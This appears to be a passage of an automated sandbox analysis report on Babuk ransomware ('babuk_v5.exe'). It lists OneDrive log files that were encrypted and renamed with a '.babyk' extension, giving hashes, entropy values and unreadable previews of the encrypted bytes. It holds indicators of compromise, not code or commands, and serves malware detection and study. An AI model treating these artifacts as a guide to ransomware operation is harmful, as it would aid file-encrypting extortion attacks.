                                                                            Preview: `./..{.f.n4E.....<.26..T'.).......Y.]...5....'....?vA...r..9x.|..Q.t...lZ.M.`...Mt...l...........H.....n.#..n.s...7.e"...hcW!.&....k.K..AT..:.E..+$X..........e..>..a.7.k..n0.$}..........&.[.~.,.d.s..5..u.,.....q0YA.9....{....htT..Z.7.....R...k.x5..^.....Fn.F.xex7.leL.$t.......J.-....9...|A[D.xj...7W...._.[J..K.m.+.....F..T.n......Q...(.9".{k..-.7..V...."3.&%..$Tv......f..5k3G?.. ...k.?....(....e.T.DwR...-L._....].t8....;Q*1..M...>a.t2.M.qU....)pu.-.".......qNB4..E.K_......~.sJe..0v.. s..C...^^9O...e5....H...C...".|....1.....y....K.F......4.M.KC8...A...BA.X.....p.j.T...S.vI.|.[.1.@I.....Lb.....az.5.P..+T..!E}.o.t..<...M...6...;7....,.$Uh.}.....{+8.v...'..R.KJ.j(X.)..a.....D7...t........j...N.v.b.$W*.S..0|..@a......0...l.n5..._..-9p..w..Yhk.oH. ...>.1.(.C9[..b.a....N.@..G..f1..).&..#.u.......#...a...z.../=........t.8ie...q..@#@%..SEu<...a..C........g..W...7.......r%b...2. >#..>....O.M...R.z....d...6......,...5t....v~.d..*].Ze....!..Y.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2019-06-27.1954.6516.1.odl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):5945
                                                                            Entropy (8bit):7.975653594765339
                                                                            Encrypted:false
                                                                            SSDEEP:96:qyLiVeWkLBbqQGShjIxWXA/7SPuB526fFr7FY7OGCEWYUhFRYwapvojzQg0veKSY:WefLxGHWwGuBYktFfNYUhFRY5pvKHZvG
                                                                            MD5:DF0BAD8A2EFB7FDAEAB3B2675CB67D29
                                                                            SHA1:DFA28375FFBAD963259CB620CB0E6C6D7EB54C54
                                                                            SHA-256:08DAC2D017D0BAF05BFBB3F2139FC20D65547EE0CB1F49F50AC9EB79390C508E
                                                                            SHA-512:65DD00F826C9FCC3C20CAF63CFB3BF5D2194D23A57BA549BF1FC5786D6CF2931A88CDFAE6D2011CF05D9C38C982D8A47C311FA3217167A2B0D7C92635721D16E
                                                                            Malicious:false
                                                                            Preview: ....2.L..>D6o|....2.K.1.G..UW#P...D.YQ....2...b3/...*..MGW.b..q..B.7qz......;...V.u...."nw..;Z.....P.+lwhx....|.Q...aKU.Ed..`VK..mv?..(I.0.y..2[.(..Y...0_.3./G.e..su.Rv=.....KR.Q.Ue..\.&...r.tT....2a].>o.Q...PQH.2i$......*<*.Ie...vL......Y.4j2...G.F..Q....5.....~......(.a1.Y6t..P.d..U..y.R.. H.k?......./...."[.../=..T ......2...p.<.*..'..Q..'...H.L/&...6..*=-.6.^.B......yjN...U.....A,7m.Yq...dm..6.n.X.v....G.q...-.?..{*.7u.K*.qc.ASG.......GK..v...N...rs.R..I........3..c.f....d..6\.E=Q.t... .-...gS..(g..,..........CeO.......W.~.18.......{.....%.u...sv....ia3.W...D...G..hT.......y.5....E&...........d~*H ...........x....iZ~ME&..6...}g9..*d.%.../.....uI.....5}..jg.F.(.h#j..h.>.M.(.!.RO..$..[..9\m.m.5.n...ou$%.cg.....!...H..Y=...r...RG.....g.n....h.....Au.h_..c.....\..O..XG]....{.0.x.....J..8D6....H.b^Rp.$spC....I...#.9...03.O...6..L...9-...E$.P.8.....qR..u.............#o...%.6.Az.Q......TY.p..s.Q..t.7NP.......-...q=e.5\`/8............$..~./
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2019-06-27.1954.6860.1.aodl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):6002
                                                                            Entropy (8bit):7.970068259090698
                                                                            Encrypted:false
                                                                            SSDEEP:96:8dXmM0cYv1vgKaLvhwbli6r0TbB7Dg8tS/F8WDi+2Y6Z7NXL0vkAeQs86ysL5oTC:QmMRO14KaeblgTF7MSS/N54bkeQD6ysb
                                                                            MD5:AC3A72D6102A8A234E2DAA4E17A6EFA3
                                                                            SHA1:4EAA855215152A290A884FC6518B48F7A9F92A99
                                                                            SHA-256:1CE6F7C110F1FBA80BC2BA4AAEAA0AFB5393C96B7EDBB121796EA032190BF580
                                                                            SHA-512:303293CE8AFBB35BA949FB188F9F214483D24503FA4376272F0097412C6E6877A8E7FEE2DE0A49A1ED4CD49D170FB8869B4FAC59F4A48D2F7EA1C536B19DACF0
                                                                            Malicious:false
                                                                            Preview: y..13yp.#.qf.....rw........y....e..P....6.~...0.J..:...XI.QbRX.I.C.2..f...:...T.P..R.........q.fae.4....l..[..W..is..=..L.K)j.J.+.(..u...-E*.B.......a.0U%.H.k...<.:.....&....].@.....tLF..._ ..:..7.&EVM....ni..U/4.Azz.B..+...........H....N...0d...m....SMF-...e.e..cXaK.$.a....72*_.X.wu..g.n....o..B.Y.|..|>'.......\...JU..}...l.....]..9]>..0.=+'!.|n..5d...g.~L.75...$.Ul......Y..Z+].@>+.y..]W..g..6.B.r6..., ....cEmj......}.$....{...9.B.dT!..o".a.a()..q.......F....0.._c{...%:....1Ne..:-Bc....G2.L......'.x..exy.7.``.N8.k......Q,.X.FK..Z.gg.....".DP`.9E.zK..>...2..JY.:..b.@.......B.?..W.d.R~.<xM,.:..N..."...|=....nF..U......[=.@g..zq...zap.$.h..o.d..kXY}R.*...i.v..S{.tZ\.......T.TY..........k.|.b..j.V.F..r.U./:...SM......I.f.K..B....(I.......rJ5..h....m.IH.s.B......U.c..:.;..l.......3ot=...h_...!.o.....w..y...?...i..4?.`.\.......E.'..Q......_...s#.............Ix?...7.d..EC..{.<..f1..`.u.I..]...p.0.{.L};.y....q.V..P.g.B....s.s{.>..2....O
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser-2019-06-27.1954.6860.1.odl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):748
                                                                            Entropy (8bit):7.742392976217262
                                                                            Encrypted:false
                                                                            SSDEEP:12:GO4tzJzUcCsBKcZP7Sfmo6+Lfht6dABpbn0rWS4V3NIAPI8b972FuL+qttVKGD:gJusBKcZP6DO0n2mdxwI972F/qttVKs
                                                                            MD5:51D53D6A7D210299B5697D1D9A794640
                                                                            SHA1:CF42C26122D9158014273493705AE9DD6A00D416
                                                                            SHA-256:A767F13EBF76C342FD3944CF0CD77B55DF436E7C358E15EDA819B4E2240F77CD
                                                                            SHA-512:A1D6BEA174224F96F91B3350D0B517B9387C9A148C97E2F2E32413A6587363B3B09377CB2263ECFC2F4A8741220F735FB1D8EB0DC2BCD0841F06459D6766F777
                                                                            Malicious:false
                                                                            Preview: ../...`...>a.&;v.....s.]...Z..^.L".BAIb.....q2.@....H...\>V,.G...........N.>........9..*,...d@<.y.........m.Q...7....]]z.^*.HaN..`..4.x.J..YvPx.e7G.i...Y:.5.8.w7..R...P.9{..}....A7xU.....4..:m.).STk.g..........y.8.f.d.=.'(...0;....~A..s....m..U..?~V....-D.SH...!..B..a.n,Z..v....\...+.t.'^...D..........O,.h....6%.......;'...b.jFd,w..4?GF......]...D..H...X...J..+.....54.l....f...e...{8..y.^..-p.y............#........[2.......x...M....gO.....=.<PO.^|...G,..H..../.....-r._..S.gy....M.O.Q....9..b...p...G.+u........ZN.$../u.z.T.,.......*.|....J.1/..Oo.......?y....$.}.....~...B..p\.p3.k.3...P..[..+/....w%..d.......kZ.....K.....z..q.y.RG.......JS..~.L....A.U...}.l..l...-..7...W....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_125252_1864-1868.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):564378
                                                                            Entropy (8bit):7.999703262976329
                                                                            Encrypted:true
                                                                            SSDEEP:12288:vbZu+GZNHq6l2PHOe7gcoFVKrvgJ8PdDTZSKtEDk5Pwf:Dg+Gn7l2PH3gFMrvgJgTZS345Yf
                                                                            MD5:4661EB34808ADC1CFC796BFD1BBAAB7B
                                                                            SHA1:3E78AD4D3EBF3C19DDC9FAB222CA6F03A75BF0DA
                                                                            SHA-256:8743BD63DC18B7C1EAD0F1E4D259187C49DC9E4284AC876587A396DF919039B7
                                                                            SHA-512:5DBD9E53D660D30BAD67305007CB99003AEB5FB3309EB4350BBE4A38B9A3CAD902908BB2E59F70E94AB0C58E147BDA1231F8B40E5620604099B8E87886B4FBB0
                                                                            Malicious:true
                                                                            Preview: .+3.,..N.K.96.t~n..`j6.*6.A.w...?.............T.......\1.j@..9.y0c.Z....LK..)~H.D..t..0`b.......1...$..)pm5}.W...(.%I...s....W+.MC.(...:......;V.g.^.....].EiMeH..|q....DT.5..`.GO...!F\../.1.d......>....@.t.......@."...2,......[..H........>?._>.`.Y.~..]....mM..dk>T.........~%58.r..,7..P.\...Rr..EM.,..'5U.o!.'.x..~....w.>U....m.1.0N....2N.;.c.....B.0-.`..o...(6A.....%.k.e.S_.'.. .B.].......]WU.g...[..+.<>P.T...Q".&L.C..I..........2..4\._q.{.2.[.oW[[@>h..J......@.^...._......]^f...Zy....`..d=...P.*ij.R...../F@7.!.)...+.Fi.hc!..OK.....aA.Qu....c....U......N...../.C.....0g.T..^.....H*....rE>....Q].S.....Z.....G.....)..:.. ..Xe.o..k...q...,U[../.K..2.X......s..Rd..P2.P.g.y....6...(.G,.R..'..#D..*%..?H..2M.;..8}`u/........n0..)k..w.\G.t.'WL...G..h]HR.....b...i./TL....D...N!Az..QL5._rhx..__Y.... .e.vNR...;..Z......1y.*..U"Q.*rg..`#~...q.#.>...k0T........=.hoa.O.j>.w.0Ib%.H3.`.`.]....0v..Pr......U4..1...X...u..60V3...D....0y.z.)...PP..K.....".
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_195437_6860-6784.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):159254
                                                                            Entropy (8bit):7.998729545202949
                                                                            Encrypted:true
                                                                            SSDEEP:3072:fnsEm+zWSVBOvkhbQkxL3iskKfm9nVxrTNa2Jtihw6Vg+jYdMlhrT:fnsELpbZfEnVxvQ2HiK6Vg+lhP
                                                                            MD5:028305D72ECE4C907BBFB88D8ABF1B2C
                                                                            SHA1:7D61FF1D4F7C19E57CBAFC9C557F76DB89CF935C
                                                                            SHA-256:5E10B27BD5A89F2F06B0D29165AD8808D8FDF3E6C1DFCA0C7CB13912A6F88614
                                                                            SHA-512:410E2E9E7B5EC9D0B73561D94BC0D0EFDDD0F672F758B712E474CB9101CE5C1EF555E8F583AFB40BAD01406D60EDE4C62FFD242FD1A5F53F8C092C79C28C10AF
                                                                            Malicious:true
                                                                            Preview: 4#.v..Q....7...b...u5....E...../........a.~...p<].Q...h...e'.{=.tU...L}..k..%8v...\k....7..i...ql@.Z...s..n..j.Ms~J...3.:=R..%.......~l...USVSy.....).E....U...']..Zc.a.Ap..T...Y...=.........n:.K.*..%.n.>...L...._gQ.~...i.....:..F..;i.F........r......h>g.JV.o.\j....UW.......~.<...........S^u...rHO.....3`..E.*M.p]../.r.B..c..v...}.."...G..;|.&.........X>..[@.?.F......U`...69>....Vx._..G.u.g..ss.d.()........Z.$..H./.p...H.......U,?6K$6..U.1...`....*.*.AL.}h#..WQ.,.;(.....*.......w....95u.....mF.JP._.\.g*..W.+.Z.....wy.R..Z..t0.P..0H}..1.n.Q^..QD.B.j,.>.gC.;....Y.z..}....f....F.M8...:\"=.........k.....0#G&...f2FG>Yrw..bh.......|h.Y..8.TM^B5..^...q.=.b}.%5.1...A......]_x..W.Wk.L.6.Mz..E.\p.<.,..M.5..Kt...7.%..:....L...9.lw.Kd...iY..+.qbI....g.^.r..&.,r...8..X.7...C.R.....q..f........c.4._q|;.E....z.4..zcF'N(.......5...g..40........>`..7.q.'...1.O...%..?.....u....8..o..0.s.v._...........6...j......ev........a.........$...1.!`.KS7...l...f..a.L'....
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_125251_1844-1848.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93660
                                                                            Entropy (8bit):7.997858958611787
                                                                            Encrypted:true
                                                                            SSDEEP:1536:1+eFvUtffxhf8kxP2hLNz+KGnDjNev2GnFPx1BsmmLSm7N46QOk6EF+Mh1pQCS:1otR18N1xLGXNebnFpzMSWN46U6NMljS
                                                                            MD5:EBE79B9BD43A4097E22130470358D692
                                                                            SHA1:A50C50B6748BC7FF6E1EDAA4A3C79F998F541B8B
                                                                            SHA-256:797989C311F0C7842D4A115D842AE743EAF8D0519127A81CC496BFF73EC791E6
                                                                            SHA-512:1D1B286D2FF1C42A8ED6DD97C74B2768FE0CB5FCBFC1C1BB803BBF53041B4DD7639E6ECB82AEE74EFAE7DB1743D6738A38968EC300CA4E7ECC4E85D911E8E939
                                                                            Malicious:true
                                                                            Preview: .#Q...W.B......1....Y.<c.(.F.>..h....e...H.N.A..m..i...8...d..c...N....Ax..1..g....S....=.>.N...gR .gQ..v8.y....I...-O......j..4...J\m... .'.t.e..C_.`R+t...KxO.e<..._1....}.......|C...........5...~.n..M....L...^D..p...1..@.;VH .X%k.%.B...5..g.-..K..g+..!..I...c`.[.....[2...\i....-)..w.b..^..B.F.!..v...2..L9E.'..f4+..'n...s}..5..R..1.{...._..r.......`.<.M\.;;".kad.4...... _:.{.AF.......k...s.U.Z.B3J.>..$o....r..]'...R1..qVN9.Cl_....5.T)|............\eh|@.ku...}.|Q..u^wu.....-YP.6...I...yE...N..i..w`[.@..*^o.b......Q..n._K..?fK%..qx.Gv.O'q3..R....I...9N.:p.AT.r&J..@..RW.0...n....D.x.......n........u..2r.w.Eb..%E' )5..|...K..J....h.E%.P.G........q?xo.E91....0.W8..-.....Pc$^...:`.........h.G5=y.RK.G~??_..b..A.-.......P..9....`.q8..p.r1./+'..d0%Ct..Y5....z.H8I[s........<...(.Aj..:....J..V......b.../G...G..d$.B.Y...~.b.....M....&f.(......oi...nh....}sP../h.J..C<...o3.#G.fD.<........c2.'.Ps...OL&.....p.#....~5.04j....T......T.sA.mz.s.AJ.E`.....
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_195423_6516-6324.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):40266
                                                                            Entropy (8bit):7.995002525037019
                                                                            Encrypted:true
                                                                            SSDEEP:768:A5+KBe4hNGs91LVeJHYPJvijyDaj+DSU0Bv3sCZiPA:AIK/NLLWY5aypmU0BCA
                                                                            MD5:24A40F7F40BD282E18BFBDD637290769
                                                                            SHA1:B07D85E9481B0619AE455D67B4F700176A4B1FE3
                                                                            SHA-256:28B1C6AB0D728F5C579288EDCBCB16ABA90EAB84CB3E90F2E54158C4F828965A
                                                                            SHA-512:4C81B5CE08F6D2AB2BCDA34029865E4A9F9721DA1CF0DCA31E693C9B0EC760ED0B887B6377F6A7C32B5D332B30E5401BE2F534215EBA3FA1A2368852AF77EAE6
                                                                            Malicious:true
                                                                            Preview: r3..J......{D,.....b.....&C....5.S..w..t.CD.!....#C..l..".....~.l...AKk..}.5..u.8..qc.....}.m...,.[y@.5y..s.w....!..R..I.m&...'....T+....,...[.F.......=L(.....2C;..bm.km..Kd...d.g...4yf.7...%k..FQ2...M>P.z..q....w.Ap.<o...Kw.ts......q..#s...d.li..Ya..9.....FMl.Cq.I...n.0z.....,..4o.\....G.|!B{...Z.c./.^..]...z.=.......;.0.....(i.....Ns.H...|3]....Z1<.1.^<ww..w.?..U...oI.5...d...:R.cp."B..#e...v\|..'.k..4....Y...,#.b,.AQ=.B...A....C...B~....+.|X..3...}/..0.?.F...L..0.L.?k..6e..C..>H...k..A.^>....&...r...j3.J........~D...g.t....A.[..F...P%=`).&.6..r-$...Q.+..`c.h..[.K.iZ....g&L..(..2.7.<...-.4.j....%[n..)../....P....]..\.U./.....A.c_`Id..@.Ro.(....\J..@..c..^W.L.k.../.Y.aA9.'.ogp....d...4../p\..#.I?..*z..l;....t...FU.....L.{.h...1c...QJ....%w.O1...=&..[....5...\.../W..........b...3O..}.x..o.F7!vqI-...l..,R...C..Td.ZcR7-.b.....q........8.......g._v.K.".a?_ kd...X..0..j..g7nx.....j l.......8...jy.C...<.S.8."..........f........Kl....{~..4.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\StandaloneUpdate_2020-07-23_174331_1308-e78.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2062
                                                                            Entropy (8bit):7.904178866493889
                                                                            Encrypted:false
                                                                            SSDEEP:48:0kXGR80mwMz1GgU7rCtKVX8M8H3pKR9d5hshi7E3zWZ:0kXuMKyKVr8WD5uGCSZ
                                                                            MD5:A4671B98F29FC6DF7AB6FA665DDF51BB
                                                                            SHA1:21EB92D75115BE4C2E67909FB4FB33700694165E
                                                                            SHA-256:20EB08FE79967BCF9FDAE18B6FE2657D39AFBCB2A0BAE784260C8FAD75610BC7
                                                                            SHA-512:BC2C3707D9BB83CEC1C06B0552CCDE7A9BD3946C68A7F50BDA8DA8680A385CE4D482203FA68D112EB6AC134C5D6A3BF4D44674B003A14058E98B7E65272BBC31
                                                                            Malicious:false
                                                                            Preview: .........um0"..{.d:.L_...}M)....m..Q....U.j.#...y.B..;.~.67 ..i.a.7rP..v ...........n2..z........756..n.*%P.v.\j ..r.to.%........Jmn.4....-.qy.w....yU...g..U.|I...:P^.\.....1...Y.11.Ev..M...:.D.>...V.O.O..,.p@@..?}.!.......4yy.:Z..@.W... T....,J.R.S.........6...&.?M......;KX..:..7.j9A.q.............l[.....FC..u..rma."0.s81.w...zk...e.d..%**.....oN{e;..K..c#m Q...)....f......F........l.Z..Gn.I.D..2..H..i...e./GHi.w..y.D.........).E?k2.q.......~.1`.L.WX.5.....-U..`J.....:.......#..-..8m..c.i$.j*..:OhFJ...BS.ai0.....`|.Lu..d...gvG;z8..z.x.s...TH..........&S..5[g...t..w}|F..(..0u.....ed...g....#.w.t...eX;..'t...0:T.....sX'..Yc...@/.ff.[.!...?.K~%..zr....P.3`[aynsB.\"....z..\..0...:~...R.......q7.............Y.....g@l!..e.k.x...2...5f...'X...O..7..j..:.J...x.n.0....$6..~FH...X=.....!...5.t...B.7"..eS....f.....!.F."0\...I...`....Q....R{.|...(......wkSf..p ....S.;Sn)..x.V.k..fsMs.C...........k.{#.....sX.O.....J;\.V.>]..e.M.-.W..91..L.M....A
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-07-27_074908_1728-1718.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):94486
                                                                            Entropy (8bit):7.998066582074327
                                                                            Encrypted:true
                                                                            SSDEEP:1536:wuF9fZyl3zC+1CHg5/Po3WdmsgdY00IsAKXN71pU1tJq2nOviv+a89G4:wubRm3zC8vu3Wdms0Yv971piJRj+H9G4
                                                                            MD5:FD4431F797D0EF719D3D6E0C1C6A31F9
                                                                            SHA1:EF7C256504894D04930BD5B5F513D2557DA2C353
                                                                            SHA-256:7FB80513656E8379B50037E8ECC140BE798449C0BE1AE0E1A076096FBC8791FC
                                                                            SHA-512:F0CB922D4AD1388AE6E7846AE44307156E96AD1893D9045666A481B0F02AF48095F9AE5CA5D2E5046AD0F2CE858FFC5B6E576A4F585BA11AD8471526D1DB50B8
                                                                            Malicious:true
                                                                            Preview: ...d...;.1v.JJ.C.7_.I.(.9..U.....&...8M.[R$..j....:.*!}.q..x.}.X.=.\o*7TJ.m........d..........I.6.d...(..)b..a}............P....j.#.._(.....B.k..e,.fR..HmIO.......!.{E....7....otQ..I..X>a..r.g....y_.,.B2.!..Ppg]..c....QQe.. 5$....Mr..Qk+4.....C?.M.Yl..Q....E....O...m@..F.w...oA.y%.1.C.0.X7.6yy0mK.....9@...C.@.2...Nd......)._a.1..... ....N......x.%=.z....9x5....c....z....*Y.e......B&.'....v.......f.G..Qnk..zo............~}..f...ci..E....o..5?.....G[.RA.e.~.6&m.~dX&<xn+.5.........J." ...18....&......b.b.]].Ul..r.^fofn..n..8h.M}>N...DB.....S.V...c.Q.....Q.T!.8..z.=.].|W....m..G./..#/!...L.]....e+b...CW......<]@.f..-NW.|dX.=....h.....7.bN(r.o...-.' f'f.FM:.U.pH .a...g.oA.....$..\S..[.....4..I..7.\.A....y...~.!.......r..Cz/......*MjmD....."I.C.y.'Q].&3.W.....:...kF:.5............!`..3.P%. n..^....*v.L&....>.K..7....B...V.:....0.......\.*....q....xH....g....x"}e.g...9E..2.;......7......X.....@.2..,......^.7`.1!.6\?7..I....`e..U.....
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-08-26_080227_17fc-17f8.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):91780
                                                                            Entropy (8bit):7.9980869787990185
                                                                            Encrypted:true
                                                                            SSDEEP:1536:P9KaiqdSBTP/n82VJK6/RQcLYPVNss6JYlNE6fTtVpprnAhPOwhQB5eWWWnFp:EBPEQK6/RDLYNNrlNE65VpJnePKeWFFp
                                                                            MD5:7B290DB1AD3FEA357E52AA52214833F7
                                                                            SHA1:C5182EFBD2F629E4C1350B8E3E837AEEEB5EE61D
                                                                            SHA-256:41188ADB390A66A10067C654882B49AF3A4A2A35E4681BA0D3D3D3D4F0E881AD
                                                                            SHA-512:402880FC0DA0DD7D1C89C46A646961B812A39FC81BBFED415004D1A23D944E43492CA0F5D9919594F92A40AFB97E3C6A61FF371BCBF1EBBB912047EECFB9ADE4
                                                                            Malicious:true
                                                                            Preview: .DwU..F..4.....z.......2.:5i++.._#f..Y...`].."...fQ.Yf7.aG$'.".d..m.......H...T.Y!.~.&.aT....c..&jJ....L:.....2.T3.Z...TS..%$.4...k.......15H...'...L...v..O....c.~..P{.....)...5..tQz...\#X?(...kk4d%h|..../yj>n.9..`.]..iC..7....mC\..f^QV...|/JH...sq.|..S...XQ..Onj....N>./<..#..5B.A_.L.n.B.]'.....Z......3Y.N.i.>.\..:.F...~..7^...>.......}......3L....:.....A}..._Q.M({. }.b.m'.O.P... .^O_..i..."t..,..b\o..P(.O......0...|;.k!C....1..V..;.O....2..wb.FRG...V*H..t/.`.R@D.aa.a..K.C..#]Y....U]j.........4P.8.t.I.E.....}mr002.C....p.[Io.....i.{.yw..#-.... ).,....".Q.[...#.>Jc[..Aa$....V........>........q....HD.2...X........+9..z...[8..L..kkP+.,7.S'~?.0.\I.;W.j/n..!..........ts.'.>_*)1..T....(/F..~...?..BG.......7.b.f>x.|a...&.5B..POs.QZU........=c.w...G...b......:.B189......n.u....d.....s<%o..i..x`.7.Y.....d.).~..M.Y.P.~.|....R..~.Ca_.$..*0.^...yq..r.J...-O.j .o.48k)mr.A.<.xW..&......f....1Q..7.r..4;"u.Q...7....Ax.CV~=....H......k..u
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-09-30_082319_c94-ff4.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):91776
                                                                            Entropy (8bit):7.997876035833207
                                                                            Encrypted:true
                                                                            SSDEEP:1536:4g8c0KZLZbyVN2hvTxvklaeROsIU71C+sEgGnKF+wvYkJOWjKlRO7E+5PVwxR9I:4g8oLcVqv9vkcbY7psEgGKF+s7jZ7E09
                                                                            MD5:B5D6E6A44426CAAEBAF2A86DD18D7418
                                                                            SHA1:58136D4E540D06F297CA6E2DBF724C9EB00FE1DD
                                                                            SHA-256:97F1E7F98C7232AB2B74167E88DCC06402EB901C8999923EF0389231CB9ECDA1
                                                                            SHA-512:64EF766E19FA962105DB9CB46977A091533F62F1F230FE4A085DB603365AF604225BC2DDBC3B76AFD2332BDC0F865C1448822885F8D1A2571E9F156E6766F971
                                                                            Malicious:true
                                                                            Preview: ]I....o..g]lM./.J.....'.NS..9..Q...<..s.N.0...'.....c..A....#b...,...=...x.04V..?...a^Xq.v..Ms..CJ.j2;.)...`..-)6.i2.._.....9rB.Y..*.Em.. ..N|.I.0.....[c...e..&...Vt..b~..TE...b.\..~>....|.I.h.t(.b....lv.o...a....*.......R..0..T.lu\=...Q..pM.....4.f,.8..t.=..iU...v.h..kP..{l......-...L.l.%N.9.Z.....2N..$..."...4Zc,kN..I.......p...3X_;Lz....~^.6....:.-..Q.........g.0hf....*.a.....Ka.{...e..DR.'+...._.p*.1.W{.u.[QW.}`S.So_.6Re.q=..E.G."x&_rN...rN`D~....s......=...g...U3..$...s..O.I.....FN.\fJ...(..u.#.*~..,.!.OYl........R...I...W[n.D..c..K._#...r......|...n.mr..ML........wGA..U ..R.....I....C8M.29...^.h..K...u.}..R..k..TG.Wt3J3.D}q=W...M....9...D...l..f.<Z.Eg.;w...q.A.l...>..,...u..W..C...A.?.......2uk...6{....B...8..7..]l_t...H&...?.....'dp....F9!F......_.\....~..]U9.Uj...-jU.;?..2O.".....X.../.b.8..y.RG_}....oJ....H.m..M..>R'.6..;\....x.4z..4N......cp.{!..l)#..`..u.g^...dj.....#..RC..z...%_...ui.....<..3/........c.....>.=6.c`K.u~t.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-07-27_074908_16c0-4d4.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):110592
                                                                            Entropy (8bit):7.998573741410008
                                                                            Encrypted:true
                                                                            SSDEEP:3072:YUwHAsL0tGOnCS6OGDhYeSbCOjeOblf1Pg5sNmE9hh:YXoPCSsDLSe0eObxx4s/j
                                                                            MD5:A756289881FC0A722045B47472332A06
                                                                            SHA1:71EF47823768BBCF023FFA77F00A9B49BEA8373D
                                                                            SHA-256:CFF992F184FD690BC7B2B2A7EB68377C526BDEC51836363B9E470BED7CA1B1B6
                                                                            SHA-512:39B8BB93A5BECA3A3BE507CFDDE684AA335C748C1E1D6A77C1FAC386E89EBF98C79D0BC37AF29E7E5608082455F7B4DD64263EA470067358527930A19A97A469
                                                                            Malicious:true
                                                                            Preview: ....H.o;.......-..x".q.b.4.78..3...jF...#..vE....cr...d4m.UowU_......6.loTR7C.S.J. .w.V.<.H...ws......o...-....X.LE....>......R.1W./....\W..q.4....(..?..a..8._..rC...4.s&. ..f.b....:2MT...V.../J<[.Q..a[6>...3.Z.........Q;l\z..=..l..A,r6$.."........u.b!AA&......Je._l.Z.mE.7Z...^8.1=..7Or..)-.-...vD.gf..........#.f..9...w.H..0nQ.....,..5...x...0..>......<R.M..W.....A.<....=YV.....t.D.....24:..0..8.ud.......d......l..^e.j.5.j...0..4.$....z.dp....}8...._Ud.A.\.~.F....f.....y.."D#%...\.6.Q..1.8...N...J..].]..6...%..7t&.u..yO.....2*K....**3.Q...$...t.7.,.t.bGe...&m!p...6lx...i..W.7.%%..5n"M...SB...t...u.Z..V`+....h....I.W..,.8g..|)......%wD.uF.6g.8-./....D&.PZ.`.8".E..6...@.v..;5Q...~j!.....1.Rz..o....b.eP......^%....>n..D7b../....g7........;D...G...&...Q...\....C.-.....U.i.mw...>....C.v.....i..*8...I....k.$..k6..'....X.p.q`...Q.Cf*..L..Q.{|.....%.HU..Sg.E......T.1.x...*..h..S.......P.kn.<...n..l.0xI....=...k"..*.........4..3......lq..Z...Vu.2..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-08-26_080227_145c-17a4.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):93818
                                                                            Entropy (8bit):7.9980776551755985
                                                                            Encrypted:true
                                                                            SSDEEP:1536:IUgwD0dEzZ45Y6DjqKKY4JRwa2JkV/8ftJAt6fd2YSoJhbawXK2awLpbhkAKcVX8:a80GzumcqKKYSRlOkV0ftJHfd2YScK2W
                                                                            MD5:69ADA84D8FE3C35F9663A21829419F3B
                                                                            SHA1:2EAD49EBF8ED54C533CDCBFCA43C7E0456E01CFB
                                                                            SHA-256:A6C11832120D671250413CEAF5E6B0A542B7EAD609E937406A99A1CD5A1FC92F
                                                                            SHA-512:36FA38F6BEB76EC5E562B22BF04D5E77F2022592480654CE4354DBD094B794C0269C433368B42B0757B92A6B57EC598FC0A5017F9B2F9FEA6BBE1957507A07B8
                                                                            Malicious:true
